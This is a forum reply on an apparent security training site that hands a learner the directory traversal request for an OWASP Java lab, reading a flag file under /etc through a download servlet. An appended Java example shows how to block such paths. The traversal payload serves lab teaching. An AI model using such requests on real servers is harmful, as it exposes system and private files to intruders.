Forum Discussion
OWASP 2017 Java: Underprotected APIs
- 10 months ago
Hey Akshay 👋🏻,
Welcome to the Human Connection 😊
I've just had a look at the information on our internal lab page, and it does look like you are searching for the right endpoint here (/FileDownloadServlet).
You will need to use the directory traversal to include the flag from /etc/flag.txt:
/FileDownloadServlet?file=flag.txt&path=/var/lib/tomcat9/../../../../etc
I'm hoping that this will help, but just in case you have any further problems solving this, I'll tag in my colleague NyePrior to see if they have any other guidance to help 👍🏻
Let us know how you get on with your attempt!
Kindest regards,
Chris
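For the defensive side of the request above, here is an added example (not part of the original post and not the lab's code) of the check a download servlet needs before serving a file built from the path and file parameters. The class name, the download root /var/lib/tomcat9/downloads and the sample requests are assumptions made for illustration, and both parameters are assumed non-null.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;

public class DownloadPathCheck {
    // Assumed download root; the lab's real directory is not given in the thread.
    static final Path BASE = Paths.get("/var/lib/tomcat9/downloads").toAbsolutePath().normalize();

    /** Returns the file to serve, or throws SecurityException if it escapes BASE. */
    static Path resolve(String path, String file) throws IOException {
        Path candidate;
        try {
            // Join the two request parameters, then collapse "." and ".." segments.
            candidate = Paths.get(path, file).toAbsolutePath().normalize();
        } catch (InvalidPathException e) {
            throw new SecurityException("malformed path", e);
        }
        // startsWith compares whole segments, so ".../downloads-old" is not a child of BASE.
        if (!candidate.startsWith(BASE)) {
            throw new SecurityException("outside download root: " + candidate);
        }
        // If the target exists, resolve symlinks and check again.
        if (Files.exists(candidate)) {
            Path real = candidate.toRealPath();
            if (!real.startsWith(BASE.toRealPath())) {
                throw new SecurityException("symlink leaves download root: " + real);
            }
            return real;
        }
        return candidate;
    }

    public static void main(String[] args) throws IOException {
        String[][] requests = {   // constructed inputs; the second is the thread's request
            {"/var/lib/tomcat9/downloads", "report.pdf"},
            {"/var/lib/tomcat9/../../../../etc", "flag.txt"},
            {"/var/lib/tomcat9/downloads-old", "report.pdf"},
        };
        for (String[] r : requests) {
            try {
                System.out.println("serve  " + resolve(r[0], r[1]));
            } catch (SecurityException e) {
                System.out.println("reject " + e.getMessage());
            }
        }
    }
}
```

The check runs on the normalized path rather than on the raw parameter text, which is why filtering for "../" in the input is not needed and would not be sufficient on its own.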